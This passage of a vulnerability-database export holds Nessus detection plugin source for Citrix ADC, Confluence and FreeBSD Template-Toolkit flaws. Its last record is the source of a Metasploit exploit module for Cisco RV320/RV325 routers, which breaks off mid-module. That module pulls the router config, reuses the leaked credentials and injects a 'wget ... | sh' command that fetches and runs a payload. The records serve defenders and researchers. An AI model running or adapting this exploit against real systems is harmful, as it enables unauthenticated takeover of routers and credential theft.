script_set_attribute(\n attribute:\"description\",\n value:\n\"Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for\nuntrusted template files to cause reads/writes outside of the template\ndirectories. This vulnerability is a component of the recent Citrix\nexploit.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kb.cert.org/vuls/id/619785/\"\n );\n # https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e74959bf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"p5-Template-Toolkit<3.004\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:16:55", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability. 
An unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on an affected host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-22T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-22T00:00:00", "cpe": ["cpe:2.3:o:citrix:netscaler_access_gateway_firmware:*:*:*:*:*:*:*:*"], "id": "701262.PRM", "href": "https://www.tenable.com/plugins/nnm/701262", "sourceData": "Binary data 701262.prm", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T17:26:49", "description": "The version of Citrix ADC or Citrix NetScaler Gateway SSL VPN running on the remote web server is affected by a path traversal vulnerability that can lead to remote code execution. An unauthenticated, remote attacker can exploit this issue, by sending a specially crafted HTTP request to perform a path traversal that can lead to achieving remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-09T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "href": "https://www.tenable.com/plugins/nessus/132752", "sourceData": "Binary data citrix_ssl_vpn_CVE-2019-19781.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T17:02:06", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may 
be able to leverage this vulnerability to perform arbitrary code execution on an affected host.\n\nPlease refer to advisory CTX267027 for more information.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-24T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_NETSCALER_CTX267027.NASL", "href": "https://www.tenable.com/plugins/nessus/132397", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132397);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2019-19781\");\n script_xref(name:\"IAVA\", value:\"2020-A-0001-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on \nan affected host.\n\nPlease refer to advisory CTX267027 for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX267027\");\n script_set_attribute(attribute:\"solution\", value:\n\"For versions 10.5.x, 11.1.x, 12.0.x, 12.1.x and 13.0.x, upgrade to 10.5.70.12, 11.1.63.15, 12.0.63.13, 
12.1.55.18 and \n13.0.47.24 respectively.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:citrix:netscaler_access_gateway_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\");\n\n exit(0);\n}\ninclude('vcf_extras_netscaler.inc');\n\nvar app_info = vcf::citrix_netscaler::get_app_info();\n\nvar constraints = [\n {'min_version': '10.5', 'fixed_version': '10.5.70.12', 'fixed_display': '10.5-70.12'},\n {'min_version': '11.1', 'fixed_version': '11.1.63.15', 'fixed_display': '11.1-63.15'},\n {'min_version': '12.0', 'fixed_version': '12.0.63.13', 'fixed_display': '12.0-63.13'},\n {'min_version': '12.1', 'fixed_version': '12.1.55.18', 'fixed_display': '12.1-55.18'},\n {'min_version': '13.0', 'fixed_version': '13.0.47.24', 'fixed_display': '13.0-47.24'}\n];\n\nvcf::citrix_netscaler::check_version_and_report(\n app_info: app_info,\n constraints: constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:12", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities:\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. 
(CVE-2019-3396)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-02T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3396", "CVE-2019-3395"], "modified": "2019-05-02T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "700661.PRM", "href": "https://www.tenable.com/plugins/nnm/700661", "sourceData": "Binary data 700661.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:15:24", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. 
(CVE-2019-3396)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 6.14.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98638", "href": "https://www.tenable.com/plugins/was/98638", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:15:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. 
(CVE-2019-3396)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98641", "href": "https://www.tenable.com/plugins/was/98641", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:15:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. 
(CVE-2019-3396)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.13.x < 6.13.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98639", "href": "https://www.tenable.com/plugins/was/98639", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-13T16:15:24", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. 
(CVE-2019-3396)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.7.x < 6.12.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98640", "href": "https://www.tenable.com/plugins/was/98640", "sourceData": "No source data", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:17:12", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.6.12, 6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to 6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the WebDAV plugin due to improper input validation. An attacker can exploit this, via unspecified vectors, to send arbitrary HTTP and WebDAV requests from the application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget Connector due to improper input validation. An attacker can exploit this, via unspecified vectors, to traverse directories or execute arbitrary code. 
(CVE-2019-3396)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-22T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_6_6_12.NASL", "href": "https://www.tenable.com/plugins/nessus/123008", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123008);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-3395\", \"CVE-2019-3396\");\n script_bugtraq_id(107543);\n script_xref(name:\"IAVA\", value:\"2019-A-0135-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian\nConfluence application running on the remote host is prior to 6.6.12,\n6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to\n6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the\n WebDAV plugin due to improper input validation. 
An\n attacker can exploit this, via unspecified vectors, to\n send arbitrary HTTP and WebDAV requests from the\n application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e8304c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.6.12, 6.12.3, 6.13.3,\n6.14.2, 6.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3396\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Confluence File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Widget Connector Macro Velocity Template Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_name = \"confluence\";\n\nport = get_http_port(default:80);\n\napp_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"fixed_version\": \"6.6.12\" },\n {\"min_version\": \"6.7.0\", \"fixed_version\": \"6.12.3\", \"fixed_display\": \"6.12.3 / 6.15.1\"},\n {\"min_version\": \"6.13.0\", \"fixed_version\": \"6.13.3\", \"fixed_display\": \"6.13.3 / 6.15.1\" },\n {\"min_version\": \"6.14.0\", \"fixed_version\": \"6.14.2\", \"fixed_display\": \"6.14.2 / 6.15.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": 
[{"lastseen": "2021-12-28T03:32:02", "description": "This Metasploit module combines an information disclosure (CVE-2019-1653) and a command injection vulnerability (CVE-2019-1652) together to gain unauthenticated remote code execution on Cisco RV320 and RV325 small business routers. Can be exploited via the WAN interface of the router. Either via HTTPS on port 443 or HTTP on port 8007 on some older firmware versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-03-30T00:00:00", "type": "zdt", "title": "Cisco RV320 / RV325 Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-03-30T00:00:00", "id": "1337DAY-ID-32455", "href": "https://0day.today/exploit/description/32455", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer::HTML\n 
include Msf::Exploit::CmdStager\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Cisco RV320 and RV325 Unauthenticated Remote Code Execution\",\n 'Description' => %q{\n This exploit module combines an information disclosure (CVE-2019-1653)\n and a command injection vulnerability (CVE-2019-1652) together to gain\n unauthenticated remote code execution on Cisco RV320 and RV325 small business\n routers. Can be exploited via the WAN interface of the router. Either via HTTPS\n on port 443 or HTTP on port 8007 on some older firmware versions.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'RedTeam Pentesting GmbH', # Discovery, Metasploit\n 'Philip Huppert', # Discovery\n 'Benjamin Grap' # Metasploit\n ],\n 'References' => [\n [ 'CVE','2019-1653' ],\n [ 'CVE','2019-1652' ],\n [ 'EDB','46243' ],\n [ 'BID','106728' ],\n [ 'BID','106732' ],\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]\n ],\n 'Platform' => 'linux',\n 'Targets' =>\n [\n [ 'LINUX MIPS64',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPS64\n }\n ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\"\n },\n 'CmdStagerFlavor' => [ 'bourne' ],\n 'Privileged' => true,\n 'DisclosureDate' => \"Sep 9 2018\",\n 'DefaultTarget' => 0))\n\n register_options([\n Opt::RPORT(8007), # port of Cisco webinterface\n OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! 
(We are limited to 50 chars for the initial command.)', '/']),\n OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),\n OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.\n ])\n deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.\n deregister_options('SSLCert') # not required since stager only uses HTTP.\n end\n\n def execute_command(cmd, opts = {})\n # use generated payload, we don't have to do anything here\n end\n\n def autofilter\n true\n end\n\n def on_request_uri(cli, req)\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\n @cmdstager = generate_cmdstager().join(';')\n send_response(cli, \"#{@cmdstager}\")\n end\n\n def primer\n payload_url = get_uri\n print_status(\"Downloading configuration from #{peer}\")\n if(datastore['USE_SSL'])\n print_status(\"Using SSL connection to router.\")\n end\n res = send_request_cgi({\n 'uri' => normalize_uri(\"cgi-bin\",\"config.exp\"),\n 'SSL' => datastore['USE_SSL']\n })\n unless res\n vprint_error('Connection failed.')\n return nil\n end\n\n unless res.code == 200\n vprint_error('Could not download config. 
Aborting.')\n return nil\n end\n\n print_status(\"Successfully downloaded config\")\n username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]\n pass = res.body.match(/^PASSWD=(\\h+)/)[1]\n authkey = \"1964300002\"\n print_status(\"Got MD5-Hash: #{pass}\")\n print_status(\"Loging in as user #{username} using password hash.\")\n print_status(\"Using default auth_key #{authkey}\")\n res2 = send_request_cgi({\n 'uri' => normalize_uri(\"cgi-bin\",\"userLogin.cgi\"),\n 'SSL' => datastore['USE_SSL'],\n 'method' => 'POST',\n 'data' => \"login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch¤t_password=&new_password=&re_new_password=\"\n })\n\n unless res\n vprint_error('Connection failed during login. Aborting.')\n return nil\n end\n\n unless res.code == 200\n vprint_error('Login failed with downloaded credentials. Aborting.')\n return nil\n end\n\n #Extract authentication cookies\n cookies = res2.get_cookies()\n print_status(\"Successfully logged in as user #{username}.\")\n print_status(\"Got cookies: #{cookies}\")\n print_status(\"Sending payload. Staging via #{payload_url}.\")\n #Build staging command\n command_string = CGI::escape(\"'$(wget -q -O- #{payload_url}|sh)'\")\n if(command_string.length <= 63)\n print_status(\"Staging command length looks good. Sending exploit!\")\n else\n vprint_error(\"Warning: Staging command length probably too long. 
